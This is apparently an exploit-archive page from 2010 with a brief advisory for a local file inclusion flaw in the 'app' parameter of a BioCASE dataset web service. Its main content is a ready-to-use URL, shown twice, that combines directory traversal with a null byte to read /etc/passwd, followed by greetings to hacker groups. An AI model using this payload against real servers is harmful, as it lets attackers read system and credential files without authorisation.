[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GCP 2.0 datasets provided as BioCASE web services
# Published : 2010-02-02
# Author : R3VAN_BASTARD
# Previous Title : Joomla Component com_gurujibook SQL injection Vulnerability
# Next Title : Dlili Script SQL Injection Vulnerability


========================================================================
#   .::GCP 2.0 datasets provided as BioCASE web services::.            #
#                  (Local File Inclusion)                              #
========================================================================
========================================================================
Author  : R3VAN_BASTARD
Site    : www.sux0r.net
Provider: http://www.biocase.org
========================================================================
[x] Vulnerability:/index.php?app=
========================================================================
[x] demo:
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
=========================================================================
saludos cordiales:
VALENCIA : S3T4N : YOGA0400 : JACK (PAMAN) : VRS-HCK : YADOY666
NOGE : OON_BOY : MADONK : KECEMPLUNG-KALEN : YUDIS : DECLINED
BADFELLAS.co : ALL HIP-HOP "satu atap" : BASS PRO "rhythm and Distortion"
MAINHACK : SERVER IS DOWN : ALL POINT BLANK PLAYER FEEL THE HEAD SHOT
=========================================================================